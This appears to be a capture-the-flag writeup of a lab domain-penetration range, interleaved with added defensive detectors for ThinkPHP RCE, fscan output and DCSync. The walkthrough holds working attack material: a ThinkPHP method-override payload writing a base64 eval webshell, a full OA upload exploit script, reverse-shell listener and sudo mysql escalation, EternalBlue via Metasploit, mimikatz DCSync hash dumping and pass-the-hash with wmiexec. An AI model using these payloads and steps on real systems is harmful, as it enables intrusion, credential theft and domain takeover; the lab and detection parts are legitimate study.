Initial port scan

sudo nmap --min-rate 10000 -p- 39.98.115.107
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-12 03:11 UTC
Nmap scan report for 39.98.115.107
Host is up (0.25s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

sudo nmap -sT -sV -sC -O -p22,80 39.98.115.107 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-12 03:12 UTC
Nmap scan report for 39.98.115.107
Host is up (0.033s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 21:f6:d5:f4:13:b9:8a:07:fe:b5:c5:f9:dc:8c:7b:b2 (RSA)
| 256 6c:7c:ae:fa:2e:68:1c:c3:59:bd:71:36:08:1f:db:55 (ECDSA)
|_ 256 e5:1c:0a:61:98:db:95:e4:c6:39:cf:f2:84:03:4e:8f (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Bootstrap Material Admin
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: DD-WRT v24-sp2 (Linux 2.4.37) (97%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (97%), Actiontec MI424WR-GEN3I WAP (96%), VMware Player virtual NAT device (96%), Microsoft Windows XP SP3 (95%), Linux 3.2 (93%), Linux 4.4 (93%), BlueArc Titan 2100 NAS device (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.79 seconds

sudo nmap --script=vuln -p22,80 39.98.115.107
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-12 03:12 UTC
Nmap scan report for 39.98.115.107
Host is up (0.012s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection:
| Possible sqli for queries:
| http://39.98.115.107:80/static/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=S%3BO%3DD%27%20OR%20sqlspider
| http://39.98.115.107:80/static/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=D%3BO%3DD%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=M%3BO%3DD%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://39.98.115.107:80/static/?C=S%3BO%3DA%27%20OR%20sqlspider
|_ http://39.98.115.107:80/static/?C=D%3BO%3DD%27%20OR%20sqlspider
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=39.98.115.107
| Found the following possible CSRF vulnerabilities:
|
| Path: http://39.98.115.107:80/
| Form id: loginfrom
|_ Form action: login.html
| http-enum:
|_ /robots.txt: Robots file
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 56.26 seconds

Getting a shell from the outside

Port 80 serves a login page; typing in some random input just gave a 404?? The directory scan results were of no use either.

The favicon identifies it as ThinkPHP, though an fscan scan would pick that up as well.

Use the exploit.

First send the GET parameter ?s=captcha

Then POST the following parameters:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/PgoK | base64 -d > shell.php
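The request pattern just shown is the well-known ThinkPHP 5.0.x method-override RCE that fscan later reports as poc-yaml-thinkphp5023-method-rce. An Apache access log alone cannot catch it, because the decisive parameters travel in the POST body, so detection belongs in a WAF, application middleware or body-logging proxy. The classifier below is an added example and not part of the original writeup; the sample requests are constructed, and the verdict names are my own.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests (method, request target, POST body); not captured traffic.
SAMPLE_REQUESTS = [
    # the pattern used on this page: method override into Request::__construct with a filter callback
    ("POST", "/index.php?s=captcha",
     "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id"),
    # legitimate POST to the same route (a captcha answer)
    ("POST", "/index.php?s=captcha", "code=AB12"),
    # ordinary page view
    ("GET", "/index.php?s=index/index", ""),
    # benign REST-style method override, which must not alert on its own
    ("POST", "/api/user/7", "name=alice&_method=PUT"),
]


def classify(method, target, body):
    """Classify one HTTP request against the ThinkPHP 5.0.x _method RCE pattern.

    Returns (verdict, indicators) where verdict is one of
    'rce-attempt', 'suspicious' or 'benign'.
    """
    params = parse_qs(body, keep_blank_values=True) if method.upper() == "POST" else {}
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    indicators = []

    override = params.get("_method", [""])[0].lower()
    # _method=__construct is never a valid HTTP verb; it only makes sense as a way to
    # reach the Request constructor, so it is the anchor of the rule.
    if override == "__construct":
        indicators.append("_method=__construct")
    else:
        return "benign", indicators

    # The constructor payload carries a filter callback (filter or filter[]=...) and
    # the input the callback is applied to (server[...], get[...], post[...]).
    filter_keys = [k for k in params if k == "filter" or k.startswith("filter[")]
    if filter_keys:
        indicators.append("filter callback: " + ", ".join(params[k][0] for k in filter_keys))
    injected = [k for k in params if k.startswith(("server[", "get[", "post["))]
    if injected:
        indicators.append("injected input: " + ", ".join(injected))
    if query.get("s", [""])[0].lower().endswith("captcha"):
        indicators.append("route s=captcha")

    verdict = "rce-attempt" if filter_keys else "suspicious"
    return verdict, indicators


def scan(requests):
    """Return the verdict for every request, in order."""
    return [classify(*req)[0] for req in requests]


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        verdict, why = classify(*req)
        print(f"{verdict:12} {req[0]} {req[1]}  {'; '.join(why)}")
```

A lone `_method=__construct` is already worth an alert (no legitimate client overrides to a PHP magic method), while `_method=PUT` or `DELETE` from REST clients must stay quiet, which is why the rule anchors on the override value and only escalates to rce-attempt when a filter callback is present. Upgrading ThinkPHP past 5.0.23 or 5.1.31 removes the underlying bug; the rule is for spotting attempts against what is still deployed.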

Damn campus network: AntSword could not connect to the shell for ages and I wasted almost 3 of my range credits (沙砾), argh; switching to mobile data it connected right away.

Privilege escalation

Let's get a reverse shell: upload a reverseshell.php and start a listener on a public VPS:

rlwrap -cAr nc -lvnp 443

I first listened on port 1234 and could not get a connection back, presumably because of a security group filter or similar; switching to 443 (the default HTTPS port) worked.

Visit the file in the browser and the shell comes in.

sudo -l shows that MySQL may be run as root.

sudo mysql -e '\! /bin/bash'

flag01: flag{60b53231-

Lateral movement

https://github.com/shadow1ng/fscan/releases/tag/1.8.2

Upload fscan through AntSword

Check result.txt

172.22.1.15:80 open
172.22.1.2:88 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:22 open
[+] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.1.2 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetInfo:
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetBios: 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] NetInfo:
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] NetInfo:
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] WebTitle: http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetBios: 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle: http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
172.22.1.2:139 open
172.22.1.18:3306 open
172.22.1.2:88 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.15:22 open
172.22.1.18:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
[*] NetBios: 172.22.1.2 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetInfo:
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] NetInfo:
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetBios: 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios: 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle: http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] WebTitle: http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] NetInfo:
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[+] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
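The result.txt above mixes port lines, NetBios/NetInfo blocks, web titles and findings, and repeats itself when fscan is run twice. The parser below is an added example, not part of the original writeup or of fscan itself; it turns that text into a per-host inventory and orders hosts for remediation (domain controllers first, then hosts with confirmed findings). The sample input is a subset of the lines shown above, with one port line deliberately repeated.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Sample input: lines copied from the result.txt above (a subset, one line repeated).
SAMPLE_RESULT = """\
172.22.1.15:80 open
172.22.1.2:88 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.21:139 open
172.22.1.21:135 open
172.22.1.15:22 open
172.22.1.21:445 open
[+] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.1.2 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetInfo:
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetBios: 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle: http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] WebTitle: http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
"""

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
RE_PORT = re.compile(rf"^({IP}):(\d+) open$")
RE_VULN = re.compile(rf"^\[\+\] ({IP}) (\S+) \((.*)\)$")          # [+] ip NAME (os)
RE_POC = re.compile(r"^\[\+\] (https?://\S+) (poc-\S+)")         # [+] url poc-yaml-...
RE_NETBIOS = re.compile(rf"^\[\*\] NetBios: ({IP}) (\[\+\]DC )?(\S+) (.*)$")
RE_WEB = re.compile(r"^\[\*\] WebTitle: (\S+) code:(\d+) len:(\d+) title:(.*)$")
RE_NETINFO_IP = re.compile(rf"^\[\*\]({IP})$")                   # header of a NetInfo block
RE_NETINFO_VAL = re.compile(r"^\[->\](.+)$")                     # name or address in that block


def new_host():
    return {"ports": set(), "hostname": None, "os": None, "is_dc": False,
            "names": set(), "web": [], "findings": []}


def parse_fscan(text):
    """Parse fscan result.txt text into {ip: host record}; repeated lines collapse."""
    hosts = defaultdict(new_host)
    current = None  # IP the current [*] NetInfo: block refers to
    for line in text.splitlines():
        line = line.strip()
        if m := RE_PORT.match(line):
            hosts[m[1]]["ports"].add(int(m[2]))
        elif m := RE_VULN.match(line):
            finding = f"{m[2]} ({m[3]})"
            if finding not in hosts[m[1]]["findings"]:
                hosts[m[1]]["findings"].append(finding)
        elif m := RE_POC.match(line):
            ip = urlsplit(m[1]).hostname
            if m[2] not in hosts[ip]["findings"]:
                hosts[ip]["findings"].append(m[2])
        elif m := RE_NETBIOS.match(line):
            h = hosts[m[1]]
            h["is_dc"] = h["is_dc"] or bool(m[2])
            h["hostname"], h["os"] = m[3], m[4]
        elif m := RE_WEB.match(line):
            entry = {"url": m[1], "code": int(m[2]), "title": m[4]}
            ip = urlsplit(m[1]).hostname
            if entry not in hosts[ip]["web"]:
                hosts[ip]["web"].append(entry)
        elif m := RE_NETINFO_IP.match(line):
            current = m[1]
        elif (m := RE_NETINFO_VAL.match(line)) and current:
            if not re.fullmatch(IP, m[1]):       # addresses repeat the header; keep names only
                hosts[current]["names"].add(m[1])
    return dict(hosts)


def prioritize(hosts):
    """Order hosts for remediation: domain controllers first, then hosts with the
    most confirmed findings, then the rest by address."""
    def key(item):
        ip, h = item
        return (not h["is_dc"], -len(h["findings"]), tuple(int(o) for o in ip.split(".")))
    return sorted(hosts.items(), key=key)


if __name__ == "__main__":
    for ip, h in prioritize(parse_fscan(SAMPLE_RESULT)):
        tag = "DC " if h["is_dc"] else "   "
        print(f"{tag}{ip:14} {h['hostname'] or '-':28} ports={sorted(h['ports'])} findings={h['findings']}")
```

Read from the defender's side, the same file says that a 2008 R2 host is still unpatched for MS17-010 and that the internet-facing ThinkPHP host is vulnerable; the ordering puts the domain controller and those two hosts at the top of the patch list.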

We now have a shell on .15. Looking at .18, it has port 80 open, but since it sits on the internal network we cannot reach it directly, so set up a tunnel.

Using neoreg, first generate the tunnel script locally on Kali with the key pass:

python neoreg.py generate -k pass

Upload tunnel.php to the target's web directory with AntSword.

On Kali:

python neoreg.py -k pass -u http://39.99.227.141/tunnel.php

This starts a local SOCKS5 proxy on port 1080.

Edit the proxy entry at the bottom of the proxychains4 config file.

proxychains firefox

Open Firefox through the proxy.

Visit:

http://172.22.1.18/?m=login

Log in with the weak credentials admin/admin123.

Use the exploit:

exp.py

import requests


session = requests.session()

url_pre = 'http://172.22.1.18'
# step 1: log in; adminuser/adminpass are the base64 of admin / admin123
url1 = url_pre + '/?a=check&m=login&d=&ajaxbool=true&rnd=533953'
# step 2: file upload handler
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
with open('1.php', 'rb') as f:
    r = session.post(url2, files={'file': f})

# the upload is stored as <name>.uptemp; derive the .php path it ends up at
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

# step 3: trigger the task that processes the uploaded file id
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

Then write a 1.php in the same directory:

<?php eval($_POST["1"]);?>

proxychains python shell.py

Output:

Notice</b>:  Undefined offset: 1 in <b>C:\phpStudy\PHPTutorial\WWW\upload\2023-10\15_22002079.php

which shows the webshell was uploaded successfully.

Configure AntSword to use a proxy, pointing it at the local SOCKS5 server.

Get a shell.

And it turns out we are already SYSTEM.

The second flag is in the admin directory.

flag02: 2ce3-4813-87d4-

In the earlier fscan results we saw:

172.22.1.21 MS17-010

The classic EternalBlue.

Use msf directly. Since our Kali has no public IP a reverse shell will not work, so use a bind shell:

proxychains msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
run

After running for a while we get a shell, and we are SYSTEM.

Domain penetration

The room is tagged DCSync, which I had not studied before. From a quick look it seems to imitate the behaviour of a domain controller? It is a mimikatz feature.

load kiwi

creds_all

The current credentials:

Username        Domain    NTLM                              SHA1
XIAORANG-WIN7$  XIAORANG  e894362a92972b35de2a54fde7af42e7  c12040a34d763f6debaace6908fa653b60884865

kiwi_cmd lsadump::dcsync /all /csv

This dumps every user's hash; we only need the domain administrator's.

500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512

proxychains wmiexec.py xiaorang.lab/administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8

Pass the hash with wmiexec to get a shell on the DC.
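For the DCSync step above, the defensive counterpart is watching the domain controllers' Security log: a replication request is recorded as event 4662 whose Properties field carries the DS-Replication-Get-Changes* control-access right GUIDs, and a subject that is neither a domain controller nor a known directory-sync account requesting them is the DCSync signal. The detector below is an added example, not from the writeup; the events are constructed records in the shape of 4662 fields, and the allowlist (the DC01$ machine account fscan identified plus a hypothetical svc_adsync account) is an assumption for this lab domain.

```python
# GUIDs of the extended rights that directory replication requires
# (the well-known Active Directory control-access right GUIDs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed allowlist for the xiaorang.lab domain on this page: the only DC fscan found
# plus a hypothetical directory-sync service account. Tune this per environment.
ALLOWED_REPLICATORS = {"XIAORANG\\DC01$", "XIAORANG\\svc_adsync"}

# Constructed records in the shape of Security event 4662 fields; not real logs.
SAMPLE_EVENTS = [
    {   # normal replication by a domain controller's own machine account
        "EventID": 4662, "Computer": "DC01.xiaorang.lab",
        "SubjectDomainName": "XIAORANG", "SubjectUserName": "DC01$", "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # a member server's machine account pulling all changes: the DCSync pattern
        "EventID": 4662, "Computer": "DC01.xiaorang.lab",
        "SubjectDomainName": "XIAORANG", "SubjectUserName": "XIAORANG-WIN7$", "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
                      "{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    },
    {   # 4662 for some unrelated property access (constructed GUID)
        "EventID": 4662, "Computer": "DC01.xiaorang.lab",
        "SubjectDomainName": "XIAORANG", "SubjectUserName": "alice", "AccessMask": "0x10",
        "Properties": "{aaaaaaaa-0000-4000-8000-000000000001}",
    },
    {   # a different event id from the same account must not alert
        "EventID": 4624, "Computer": "DC01.xiaorang.lab",
        "SubjectDomainName": "XIAORANG", "SubjectUserName": "XIAORANG-WIN7$", "Properties": "",
    },
]


def replication_rights_used(event):
    """Names of the replication rights whose GUIDs appear in the event's Properties."""
    props = event.get("Properties", "").lower()
    return sorted(name for guid, name in REPLICATION_RIGHTS.items() if guid in props)


def detect_dcsync(event):
    """Return an alert dict for a replication request by a non-allowlisted subject, else None."""
    if event.get("EventID") != 4662:
        return None
    rights = replication_rights_used(event)
    if not rights:
        return None
    subject = f"{event.get('SubjectDomainName', '')}\\{event.get('SubjectUserName', '')}"
    if subject in ALLOWED_REPLICATORS:
        return None
    # Get-Changes-All is the right that exposes password hashes, so it ranks higher.
    severity = "high" if "DS-Replication-Get-Changes-All" in rights else "medium"
    return {"subject": subject, "dc": event.get("Computer"), "rights": rights, "severity": severity}


def scan(events):
    """Alerts for all events, in log order."""
    return [alert for alert in map(detect_dcsync, events) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['subject']} replicated from {alert['dc']}: {', '.join(alert['rights'])}")
```

Event 4662 is only written when the Audit Directory Service Access subcategory is enabled on the domain controllers, and a network-level complement is alerting on DRSUAPI (MS-DRSR) traffic to a DC from any host that is not itself a DC. Reviewing who holds the replication rights on the domain object (the same rights this rule keys on) removes the exposure rather than just detecting it.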

flag3 is in the admin directory.

flag03: e8f88d0d43d6}

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

Rambling

Tried my hand at 春秋云境 for the first time; it is also my first time doing this kind of large domain-penetration range, and honestly I am not used to domestic ranges. Still, I picked up some lateral movement and tunnelling techniques. Overall it is pretty hard, mostly because it burns money (

But I heard from a senior that the 春秋 ranges are not that good, so I probably will not do many of them.